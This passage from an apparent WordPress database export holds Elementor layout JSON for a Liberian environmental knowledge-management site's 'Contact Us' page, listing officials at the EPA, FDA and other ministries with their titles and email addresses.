href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14878,2362,'_elementor_edit_mode','builder'),(14879,2362,'_elementor_template_type','wp-page'),(14880,2362,'_elementor_version','2.7.5'),(14881,2362,'_wp_page_template','default'),(14882,2362,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\"